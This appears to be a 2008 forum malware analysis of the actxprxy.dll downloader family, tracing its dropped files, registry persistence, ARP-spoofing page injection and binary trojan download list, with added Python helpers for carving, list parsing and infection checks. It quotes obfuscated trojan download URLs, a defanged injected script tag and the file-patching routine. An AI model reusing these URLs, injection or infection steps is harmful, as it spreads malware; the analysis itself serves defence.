[Original] A quick tour of the actxprxy.dll virus family
Posted on: 2008-11-12 15:10
Original thread: "Ran into a very strange virus, urgent help needed! (tears)"
http://bbs.pediy.com/showthread.php?t=76188&tcatid=43
--------------------------------------------------------------------------
I had a rough look at it. It closely resembles the one that spread through our company a few months ago and should be a new variant. I wanted to see whether it carries a web exploit for MS08-067, so I did a rough static analysis and am writing this up from memory; please point out any mistakes.
I. actxprxy.dll
The legitimate system file actxprxy.dll is overwritten in place; the file date and size do not change.
The code at the entry point is changed to:
.text:71CC12BD 90 nop
.text:71CC12BE E9 82 14 01 00 jmp loc_71CD2745
Code flow:
Downloads 397K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3E0Y4j5W2)9J5k6h3N6T1N6e0p5J5i4K6u0W2K9h3&6X3L8#2)9J5c8X3N6T1N6g2)9J5k6h3N6A6k6R3`.`. , saves it as wmsetup.dll, and executes it.
The URL is obfuscated with a simple XOR. The code contains an odd string: db 'CNNIC#v1',0
II. wmsetup.dll (gbu.gif)
Downloads 'e48K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4c8C8i4K6u0W2x3U0x3@1x3e0x3J5i4K6u0W2K9h3&6X3L8#2)9J5c8Y4g2H3k6r3q4@1k6g2)9J5k6h3N6A6k6W2)9J5y4H3`.`. and saves it as temp\qq_update.cab, using the temporary file "qqs????.tmp\qqsF2A8.tmp". Once the download succeeds it loads and executes it. This URL is also XOR-obfuscated.
III. qq_update.cab (update.gif, qqsF2A8.tmp)
This is the same as the one in KuNgBiM's "Analysis of a downloader dropped after a GDI vulnerability exploit"; see:
http://bbs.pediy.com/showthread.php?t=73991&tcatid=43
Rough flow:
1. Deletes the following registry entries:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad
JavaView
desktopwin
These are the registry entries used by earlier variants.
2. Then checks whether the \Program Files\Messenger directory exists and creates it if not.
After creating the directory, the virus writes an embedded block of code (3E00h bytes) out as \Program Files\Messenger\msgmr.dll
(the first 900h bytes of it are encrypted and are XOR-decrypted first...)
3. Registry writes:
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{DA191DE0-AA86-4ED0-4B87-293D48B2AE99}\InprocServer32]
(Default) = "%ProgramFiles%\Messenger\msgmr.dll"
ThreadingModel = "Apartment"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad]
msnmsg = "{DA191DE0-AA86-4ED0-4B87-293D48B2AE99}"
4、rundll32.exe "\Program Files\Messenger\msgmr.dll",UIMessage
5. Creates unxxx.bat to delete itself.
IV. msgmr.dll
A note on how to obtain msgmr.dll:
Unpack wmsetup.dll with UPX, then run it under debug:
debug wmsetup.dll
-a100
mov si,1110
mov cx,900
xor byte ptr[si],3a
inc si
loop 106
int 20
-g
-rcx
3e00
-nmsgmr.dll
-w1110
-q
It then writes an embedded block of code (2600h bytes) out as \windows\Fonts\Framdee.ttf (the first 4D0h bytes are encrypted and are XOR-decrypted first...)
and then executes it...
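The debug session above carves a block out of the unpacked file and XOR-decodes its encrypted prefix. The following Python is an added example (not code from the post) that performs the same carving on a copy of the file, so the step can be repeated and checked without DEBUG. It assumes, as DEBUG does for files that are not named .EXE, that the file is loaded at CS:0100, so DEBUG offset 1110h is file offset 1010h; the block size (3E00h), encrypted prefix (900h) and key (3Ah) are taken from the listing. The same function covers the Framdee.ttf block (2600h bytes, 4D0h encrypted), but the post does not give that block's key or offset, so those must be read from the sample. The host image built here is a constructed fixture, not the real wmsetup.dll.

```python
# Added example: re-implementation of the DEBUG carving step from the post.

DEBUG_LOAD_BASE = 0x100  # assumption: DEBUG loads a non-.EXE file at CS:0100


def carve_embedded(image: bytes, file_offset: int, total_len: int,
                   enc_len: int, key: int) -> bytes:
    """Copy total_len bytes starting at file_offset and XOR the first enc_len of them with key."""
    block = bytearray(image[file_offset:file_offset + total_len])
    if len(block) != total_len:
        raise ValueError("host image too short for the embedded block")
    if enc_len > total_len:
        raise ValueError("encrypted prefix longer than the block")
    for i in range(enc_len):
        block[i] ^= key
    return bytes(block)


# msgmr.dll inside the unpacked wmsetup.dll, per the debug listing:
# 0x3E00 bytes at DEBUG address 0x1110, first 0x900 bytes XORed with 0x3A.
MSGMR = dict(file_offset=0x1110 - DEBUG_LOAD_BASE, total_len=0x3E00, enc_len=0x900, key=0x3A)
# Framdee.ttf inside msgmr.dll is 0x2600 bytes with a 0x4D0-byte encrypted prefix;
# its key and offset are not in the post, so they are not hard-coded here.


def carve_msgmr(wmsetup_unpacked: bytes) -> bytes:
    return carve_embedded(wmsetup_unpacked, **MSGMR)


def looks_like_pe(blob: bytes) -> bool:
    """Sanity check after carving: a DLL must begin with the MZ signature."""
    return blob[:2] == b"MZ"


# --- constructed fixture, not the real sample ---
def expected_payload() -> bytes:
    """The plaintext block we expect to recover: an MZ signature followed by a byte ramp."""
    return (b"MZ" + bytes(range(256)) * 64)[:0x3E00]


def build_fixture() -> bytes:
    """Host image: filler up to file offset 0x1010, the block with its prefix XOR-encoded, more filler."""
    payload = bytearray(expected_payload())
    for i in range(0x900):
        payload[i] ^= 0x3A          # store the prefix the way the sample does
    return b"\xCC" * (0x1110 - DEBUG_LOAD_BASE) + bytes(payload) + b"\xCC" * 64


if __name__ == "__main__":
    out = carve_msgmr(build_fixture())
    print(hex(len(out)), looks_like_pe(out))
```

Run it against the real unpacked file by passing its bytes to carve_msgmr and writing the result out; if the result does not start with MZ, the offset or key for that sample differs from the listing.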
V. Framdee.ttf
Obtained the same way, with debug.
The program has two main modules: _2 and _3.
The flow of _3 is as follows:
Decrypts a URL and downloads it: '487K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4u0#2i4K6u0W2M7$3!0$3K9h3g2@1i4K6u0V1K9$3N6T1i4K6u0W2K9h3&6X3L8#2)9J5c8Y4k6Q4x3X3g2Y4K9h3k6Q4x3U0M7`.
This is a download list; from it the virus downloads and runs dozens of trojans, viruses and account-stealing programs.
What is unusual is that most virus download lists are plain text files, whereas this v.gif is a binary format with its own file signature.
A brief description:
The header is 18h (24) bytes long. Bytes 0-1 are the file signature 1011h; bytes 2-3 are the number of trojan download URLs (21h); bytes 4-7 are the total length, urls * 110h (272) bytes per entry, which the program verifies; bytes 8-9 are the year, Ah-Bh the month, Ch-Dh the day; the fields after that are presumably hour, minute, second...
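The header layout above is enough to write a parser that performs the same validation the sample does and then extracts the URL slots, which is how a responder would pull the download list out of a captured v.gif. This is an added example, not code from the post. It assumes little-endian fields (the sample is x86 code), that each 110h-byte slot holds a NUL-terminated string, and leaves the header bytes after the date (Eh-17h) unused; the two placeholder URLs and the date in the fixture are constructed, not taken from the sample.

```python
# Added example: parser for the binary v.gif download-list format described in the post.
import struct

HEADER_LEN = 0x18     # 24-byte header
ENTRY_LEN = 0x110     # 272 bytes per URL slot
SIGNATURE = 0x1011    # word at offset 0 (little-endian assumed)


def parse_download_list(blob: bytes) -> dict:
    """Validate the header the way the post says the sample does, then pull out the URL slots."""
    if len(blob) < HEADER_LEN:
        raise ValueError("truncated header")
    sig, count, total, year, month, day = struct.unpack_from("<HHIHHH", blob, 0)
    if sig != SIGNATURE:
        raise ValueError(f"bad signature {sig:#06x}")
    if total != count * ENTRY_LEN:                       # the length check the sample performs
        raise ValueError(f"length {total:#x} != {count} * {ENTRY_LEN:#x}")
    if len(blob) < HEADER_LEN + total:
        raise ValueError("body shorter than the header claims")
    urls = []
    for i in range(count):
        start = HEADER_LEN + i * ENTRY_LEN
        slot = blob[start:start + ENTRY_LEN]
        urls.append(slot.split(b"\0", 1)[0].decode("latin-1"))   # NUL-terminated slot: assumption
    return {"date": (year, month, day), "count": count, "urls": urls}


def build_download_list(urls, date=(2008, 11, 12)) -> bytes:
    """Constructed fixture in the same layout; header bytes 0xE..0x17 are left zero."""
    body = b"".join(u.encode("latin-1").ljust(ENTRY_LEN, b"\0") for u in urls)
    header = struct.pack("<HHIHHH", SIGNATURE, len(urls), len(body), *date)
    return header.ljust(HEADER_LEN, b"\0") + body


if __name__ == "__main__":
    # constructed placeholder URLs, defanged like the post's hxxp entries
    sample = build_download_list(["hxxp://example.invalid/001.cab",
                                  "hxxp://example.invalid/002.cab"])
    print(parse_download_list(sample))
```

Feeding the parser a file whose length field disagrees with count * 110h raises ValueError, which is also a quick way to tell a real list from a decoy or a truncated download.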
The cleaned-up trojan download list:
31fK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5I4y4#2)9J5k6e0t1K6i4K6u0W2x3U0l9#2i4K6u0W2x3U0t1%4i4K6u0r3L8X3g2%4i4K6u0r3x3o6l9I4i4K6u0W2j5$3q4T1
6a9K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5I4y4#2)9J5k6e0t1K6i4K6u0W2x3U0l9#2i4K6u0W2x3U0t1%4i4K6u0r3L8X3g2%4i4K6u0r3x3o6l9J5i4K6u0W2j5$3q4T1
150K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5I4y4#2)9J5k6e0t1K6i4K6u0W2x3U0l9#2i4K6u0W2x3U0t1%4i4K6u0r3L8X3g2%4i4K6u0r3x3o6l9K6i4K6u0W2j5$3q4T1
7e0K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5I4y4#2)9J5k6e0t1K6i4K6u0W2x3U0l9#2i4K6u0W2x3U0t1%4i4K6u0r3L8X3g2%4i4K6u0r3x3o6l9@1i4K6u0W2j5$3q4T1
fc7K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5I4y4#2)9J5k6e0t1K6i4K6u0W2x3U0l9#2i4K6u0W2x3U0t1%4i4K6u0r3L8X3g2%4i4K6u0r3x3o6l9#2i4K6u0W2j5$3q4T1
b6cK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5I4y4#2)9J5k6e0t1K6i4K6u0W2x3U0l9#2i4K6u0W2x3U0t1%4i4K6u0r3L8X3g2%4i4K6u0r3x3o6l9$3i4K6u0W2j5$3q4T1
816K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5I4y4#2)9J5k6e0t1K6i4K6u0W2x3U0l9#2i4K6u0W2x3U0t1%4i4K6u0r3L8X3g2%4i4K6u0r3x3o6l9%4i4K6u0W2j5$3q4T1
ad2K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5I4y4#2)9J5k6e0t1K6i4K6u0W2x3U0l9#2i4K6u0W2x3U0t1%4i4K6u0r3L8X3g2%4i4K6u0r3x3o6l9^5i4K6u0W2j5$3q4T1
3a2K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5I4y4#2)9J5k6e0t1K6i4K6u0W2x3U0l9#2i4K6u0W2x3U0t1%4i4K6u0r3L8X3g2%4i4K6u0r3x3o6l9&6i4K6u0W2j5$3q4T1
155K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5I4y4#2)9J5k6e0t1K6i4K6u0W2x3U0l9#2i4K6u0W2x3U0x3I4i4K6u0r3L8X3g2%4i4K6u0r3x3o6x3H3i4K6u0W2j5$3q4T1
d13K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5I4y4#2)9J5k6e0t1K6i4K6u0W2x3U0l9#2i4K6u0W2x3U0x3I4i4K6u0r3L8X3g2%4i4K6u0r3x3o6x3I4i4K6u0W2j5$3q4T1
8c2K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5I4y4#2)9J5k6e0t1K6i4K6u0W2x3U0l9#2i4K6u0W2x3U0x3I4i4K6u0r3L8X3g2%4i4K6u0r3x3o6x3J5i4K6u0W2j5$3q4T1
6a5K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5I4y4#2)9J5k6e0t1K6i4K6u0W2x3U0l9#2i4K6u0W2x3U0x3I4i4K6u0r3L8X3g2%4i4K6u0r3x3o6x3K6i4K6u0W2j5$3q4T1
10eK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0f1^5i4K6u0W2y4e0y4Q4x3X3f1I4x3U0S2Q4x3X3f1I4y4o6m8Q4x3V1k6F1k6i4N6Q4x3V1j5H3x3e0m8Q4x3X3g2U0j5h3t1`.
0bcK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0f1^5i4K6u0W2y4e0y4Q4x3X3f1I4x3U0S2Q4x3X3f1I4y4o6m8Q4x3V1k6F1k6i4N6Q4x3V1j5H3x3e0q4Q4x3X3g2U0j5h3t1`.
93bK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0f1^5i4K6u0W2y4e0y4Q4x3X3f1I4x3U0S2Q4x3X3f1I4y4o6m8Q4x3V1k6F1k6i4N6Q4x3V1j5H3x3e0u0Q4x3X3g2U0j5h3t1`.
302K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0f1^5i4K6u0W2y4e0y4Q4x3X3f1I4x3U0S2Q4x3X3f1I4y4o6m8Q4x3V1k6F1k6i4N6Q4x3V1j5H3x3e0y4Q4x3X3g2U0j5h3t1`.
0aaK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0f1^5i4K6u0W2y4e0y4Q4x3X3f1I4x3U0S2Q4x3X3f1I4y4o6m8Q4x3V1k6F1k6i4N6Q4x3V1j5H3x3e0c8Q4x3X3g2U0j5h3t1`.
30cK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0f1^5i4K6u0W2y4e0y4Q4x3X3f1I4x3U0S2Q4x3X3f1I4y4o6m8Q4x3V1k6F1k6i4N6Q4x3V1j5H3x3e0g2Q4x3X3g2U0j5h3t1`.
038K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0f1^5i4K6u0W2y4e0y4Q4x3X3f1I4x3U0S2Q4x3X3f1I4y4o6m8Q4x3V1k6F1k6i4N6Q4x3V1j5H3x3e0k6Q4x3X3g2U0j5h3t1`.
7fcK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0f1^5i4K6u0W2y4e0y4Q4x3X3f1I4x3U0S2Q4x3X3f1I4y4o6m8Q4x3V1k6F1k6i4N6Q4x3V1j5H3x3e0N6Q4x3X3g2U0j5h3t1`.
9abK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0f1^5i4K6u0W2y4e0y4Q4x3X3f1I4x3U0S2Q4x3X3f1I4y4o6m8Q4x3V1k6F1k6i4N6Q4x3V1j5H3x3e0S2Q4x3X3g2U0j5h3t1`.
116K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0f1^5i4K6u0W2y4e0y4Q4x3X3f1I4x3U0S2Q4x3X3f1I4y4o6m8Q4x3V1k6F1k6i4N6Q4x3V1j5H3x3e0W2Q4x3X3g2U0j5h3t1`.
502K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0j5H3i4K6u0W2x3e0V1I4i4K6u0W2x3U0t1K6i4K6u0W2x3e0c8Q4x3V1k6F1k6i4N6Q4x3V1j5H3x3U0m8Q4x3X3g2U0j5h3t1`.
6c8K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0j5H3i4K6u0W2x3e0V1I4i4K6u0W2x3U0t1K6i4K6u0W2x3e0c8Q4x3V1k6F1k6i4N6Q4x3V1j5H3x3U0q4Q4x3X3g2U0j5h3t1`.
638K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0j5H3i4K6u0W2x3e0V1I4i4K6u0W2x3U0t1K6i4K6u0W2x3e0c8Q4x3V1k6F1k6i4N6Q4x3V1j5H3x3U0u0Q4x3X3g2U0j5h3t1`.
9a2K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0j5H3i4K6u0W2x3e0V1I4i4K6u0W2x3U0t1K6i4K6u0W2x3e0c8Q4x3V1k6F1k6i4N6Q4x3V1j5H3x3U0y4Q4x3X3g2U0j5h3t1`.
9c1K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0j5H3i4K6u0W2x3e0V1I4i4K6u0W2x3U0t1K6i4K6u0W2x3e0c8Q4x3V1k6F1k6i4N6Q4x3V1j5H3x3U0c8Q4x3X3g2U0j5h3t1`.
955K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0j5H3i4K6u0W2x3e0V1I4i4K6u0W2x3U0t1K6i4K6u0W2x3e0c8Q4x3V1k6F1k6i4N6Q4x3V1j5H3x3U0g2Q4x3X3g2U0j5h3t1`.
36cK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0j5H3i4K6u0W2x3e0V1I4i4K6u0W2x3U0t1K6i4K6u0W2x3e0c8Q4x3V1k6F1k6i4N6Q4x3V1j5H3x3U0k6Q4x3X3g2U0j5h3t1`.
6c6K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0j5H3i4K6u0W2x3e0V1I4i4K6u0W2x3U0t1K6i4K6u0W2x3e0c8Q4x3V1k6F1k6i4N6Q4x3V1j5H3x3U0N6Q4x3X3g2U0j5h3t1`.
f4eK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0j5H3i4K6u0W2x3e0V1I4i4K6u0W2x3U0t1K6i4K6u0W2x3e0c8Q4x3V1k6F1k6i4N6Q4x3V1j5H3x3U0W2Q4x3X3g2U0j5h3t1`.
f63K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0j5H3i4K6u0W2x3e0V1I4i4K6u0W2x3U0t1K6i4K6u0W2x3e0c8Q4x3V1k6F1k6i4N6Q4x3V1j5H3x3K6c8Q4x3X3g2U0j5h3t1`.
Next, it decrypts the address '769K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4g2K6i4K6u0W2M7$3!0$3K9h3g2@1i4K6u0V1K9$3N6T1i4K6u0W2K9h3&6X3L8#2)9J5c8Y4k6Q4x3X3g2S2M7%4m8Q4x3U0M7`. and, calling it through '487K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4g2K6i4K6u0W2M7$3!0$3K9h3g2@1i4K6u0V1K9$3N6T1i4K6u0W2K9h3&6X3L8#2)9J5c8Y4k6Q4x3X3g2S2M7%4m8Q4x3U0N6Q4x3@1k6S2j5%4c8A6L8$3&6Q4x3@1c8#2M7r3c8S2N6r3g2Q4x3U0k6$3k6i4u0K6K9h3!0F1i4K6y4p5x3l9`.`. , downloads the virus, saves it as \windows\AppPatch\AcXtrnel.sdb, loads it, and executes the module in it: DLPUpdate.
The virus creates the registry key HKEY_LOCAL_MACHINE\Software\Adobe to store the trojan list.
_2 roughly loads \windows\AppPatch\AcXtrnel.sdb and resolves the addresses of the DLPTerminate, DLPInit, DLPTerminate and DLPUpdate modules.
VI. AcXtrnel.sdb
Two main modules:
1. DLPInit:
Decrypts and drops the embedded code as \windows\AppPatch\AcSpecf.dll, loads it, and resolves the FtpInit and FtpTerminate entry points in it.
XOR-decrypts the address 593K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3k6@1M7q4)9J5k6h3c8T1z5o6R3@1z5o6t1&6i4K6u0W2K9h3&6X3L8#2)9J5c8X3k6@1M7q4)9J5k6h3q4K6M7q4!0q4c8W2!0n7b7#2)9^5b7#2!0q4y4q4!0n7c8q4)9&6b7#2!0q4y4q4!0n7z5q4!0n7b7g2!0q4y4g2)9^5c8W2)9^5x3W2!0q4y4W2)9&6y4g2!0n7x3q4!0q4y4q4!0n7b7#2!0m8x3q4!0q4z5g2)9^5x3q4)9&6x3W2!0q4c8W2!0n7b7#2)9^5b7#2!0q4z5q4!0n7x3q4)9^5x3#2!0q4y4#2)9&6y4q4!0m8z5l9`.`. and calls FtpInit.
Decrypts and drops embedded code as \windows\system32\drivers\eth8023.sys, modifies the registry, and then loads the driver!
Reads the subkeys under HKEY_LOCAL_MACHINE\Software\Google (written by DLPUpdate), sends ARP spoofing packets to hijack HTTP traffic, and inserts the malicious web page into the legitimate pages as they are returned!
3. DLPUpdate:
Decrypts the address '86fK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3y4K6M7#2)9J5k6h3c8T1z5o6R3@1z5o6t1&6i4K6u0W2K9h3&6X3L8#2)9J5c8X3y4K6M7#2)9J5k6i4c8^5N6q4)9J5y4#2)9J5y4X3&6T1M7%4m8Q4x3@1u0Q4x3U0k6F1j5Y4y4H3i4K6y4n7i4K6u0o6i4@1f1@1i4@1t1^5i4K6S2n7i4@1f1^5i4@1u0p5i4@1u0p5i4@1g2r3i4@1u0o6i4K6S2o6i4@1f1^5i4@1u0r3i4K6V1&6i4@1f1$3i4K6V1^5i4@1q4r3i4@1f1@1i4@1t1^5i4@1q4m8i4@1f1@1i4@1u0m8i4K6S2o6i4@1f1^5i4@1u0r3i4K6W2n7i4@1f1#2i4K6R3^5i4@1t1$3i4@1f1$3i4K6V1$3i4K6R3%4i4@1f1@1i4@1u0n7i4@1t1$3i4@1g2r3i4@1u0o6i4K6S2o6i4@1f1#2i4K6R3&6i4K6S2p5y4q4!0q4y4g2!0m8c8q4)9&6y4#2!0q4z5q4)9^5b7g2)9^5x3W2!0q4y4W2)9&6y4W2)9^5y4#2!0q4y4q4!0n7b7W2!0n7y4W2!0q4y4W2!0m8x3q4)9^5y4#2!0q4y4g2!0n7c8W2)9&6y4#2!0q4c8W2!0n7b7#2)9&6b7g2)9J5x3f1u0q4N6R3`.`. ; after two 00 bytes comes the XOR-encrypted web exploit content.
After decryption it reads: <script language="javascript" SRC="hxxp://y.ads009.info/vip.js"></script> (to avoid accidental harm I changed http to hxxp).
After verifying the file header, the virus writes the data that follows into the registry for the ARP attack to use.
Unfortunately y.ads009.info appears to be dead, so there was no way to see whether it served an MS08-067 exploit.
In cases analyzed earlier, the .js pointed to an .htm, which in turn linked to n further pages exploiting vulnerabilities in Flash Player, MS06-014, RealPlayer, the 联众 game lobby, 暴风影音 and others to download a trojan; that trojan is a copy of update.gif.
VII. AcSpecf.dll
I had uninstalled VMware and did not capture a sample. As I recall it mainly implements three functions: FtpInit / FtpSend / FtpTerminate.
VIII. 034.cab
...
1. Reads \windows\system32\actxprxy.dll and checks whether it is already infected; the marker is whether the word at file offset 14h is 315h and the word at offset 16h is 1011h. If not infected, it parses actxprxy.dll, saves the original entry-point code, patches the entry-point code, and inserts the virus code into slack space in the file so that the virus code runs before the original code; the file size and date are left unchanged. Judging from the current code, the four bytes 315h and 1011h could be used to immunize against this virus.
2. Drops ThunderAdvise.dll into \windows\Downloaded Program Files\ and modifies the registry to auto-start it.
3. Then drops uninstall.bat to delete itself.
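The two indicators in step 1 (the marker words at 14h/16h and the patched entry point) can be checked offline on a copy of actxprxy.dll, which is the check an incident responder wants before trusting a host. The Python below is an added example, not code from the post or from the malware: it reads the marker words (offsets 14h and 16h are the e_ip and e_cs fields of the MZ header, which Windows ignores for PE images, so a clean file normally has zeros there), walks the section table to map AddressOfEntryPoint to a file offset, and flags an entry that starts with nop; jmp rel32 as in the patched file shown in section I. Treating nop; jmp at the entry as suspicious is a heuristic of mine, and the minimal PE32 image used for testing is a constructed fixture, not a real actxprxy.dll.

```python
# Added example: offline check for the actxprxy.dll infection indicators described in the post.
import struct

# Marker words the post reports at file offsets 0x14 and 0x16 (MZ header e_ip / e_cs).
INFECTION_MARKER = (0x315, 0x1011)


def dos_marker(data: bytes) -> tuple:
    """Return the two little-endian words at 0x14 and 0x16."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not an MZ image")
    return struct.unpack_from("<HH", data, 0x14)


def has_marker(data: bytes) -> bool:
    return dos_marker(data) == INFECTION_MARKER


def entry_point_offset(data: bytes) -> int:
    """Translate AddressOfEntryPoint (an RVA) into a file offset via the section table."""
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    coff = e_lfanew + 4
    (nsections,) = struct.unpack_from("<H", data, coff + 2)
    (opt_size,) = struct.unpack_from("<H", data, coff + 16)
    opt = coff + 20
    (entry_rva,) = struct.unpack_from("<I", data, opt + 16)
    sections = opt + opt_size
    for i in range(nsections):
        vsize, vaddr, rawsize, rawptr = struct.unpack_from("<IIII", data, sections + 40 * i + 8)
        if vaddr <= entry_rva < vaddr + max(vsize, rawsize):
            return rawptr + (entry_rva - vaddr)
    raise ValueError("entry point lies outside every section")


def entry_is_hooked(data: bytes) -> bool:
    """Heuristic: the patched entry in the post begins with nop (90) then jmp rel32 (E9)."""
    off = entry_point_offset(data)
    return data[off:off + 2] == b"\x90\xE9"


def classify(data: bytes) -> dict:
    return {"marker": has_marker(data), "entry_hook": entry_is_hooked(data)}


# --- constructed fixture: a minimal PE32 with one .text section, not a real actxprxy.dll ---
def build_pe(entry_code: bytes, marker_words=(0, 0)) -> bytes:
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<HH", dos, 0x14, *marker_words)
    struct.pack_into("<I", dos, 0x3C, 0x40)                # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 224, 0x2102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                  # PE32 magic
    struct.pack_into("<I", opt, 16, 0x1000)                # AddressOfEntryPoint (RVA)
    struct.pack_into("<I", opt, 28, 0x10000000)            # ImageBase
    struct.pack_into("<II", opt, 32, 0x1000, 0x200)        # SectionAlignment, FileAlignment
    sect = struct.pack("<8sIIIIIIHHI", b".text", 0x1000, 0x1000, 0x200, 0x200, 0, 0, 0, 0, 0x60000020)
    image = bytes(dos) + b"PE\0\0" + coff + opt + sect
    image += b"\0" * (0x200 - len(image))                  # pad headers to FileAlignment
    return image + entry_code.ljust(0x200, b"\0")          # .text raw data at file offset 0x200


if __name__ == "__main__":
    clean = build_pe(b"\x8b\xff\x55\x8b\xec")
    hooked = build_pe(b"\x90\xe9\x82\x14\x01\x00", INFECTION_MARKER)
    print(classify(clean), classify(hooked))
```

On a live system, compare the result against a known-good copy of the file as well, because a file date and size that match the original (as this virus arranges) tell you nothing on their own.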
IX. n more .cab files
... I'm exhausted